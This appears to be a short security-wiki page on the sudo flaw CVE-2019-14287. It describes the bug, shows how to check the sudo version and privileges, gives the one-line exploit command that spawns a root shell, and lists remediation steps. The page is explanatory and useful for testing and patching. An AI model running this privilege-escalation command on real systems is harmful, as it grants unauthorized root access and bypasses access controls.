SUDO(CVE-2019-14287)

Explanation

CVE-2019-14287 affects Sudo versions prior to 1.8.28, allowing users with sudo privileges to gain root access on a vulnerable system, even if they’re restricted to running commands as non-root users.

How Does It Work?

Identification

To check if the system is affected, follow these steps:

Check the sudo version:
```
sudo --version
```

List sudo privileges:

sudo -l

Example output:

Matching Defaults entries for root on sudo-privesc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User root may run the following commands on sudo-privesc:
    (ALL : ALL) ALL

Exploitation

To exploit this vulnerability, use the following command to run a shell as root:

sudo -u#-1 /bin/bash

Remediation

To prevent this vulnerability:

Restrict sudo permissions to only essential commands and users.
Update sudo to version 1.8.28 or later.

PreviousEscalation NextRCE

Last updated 7 months ago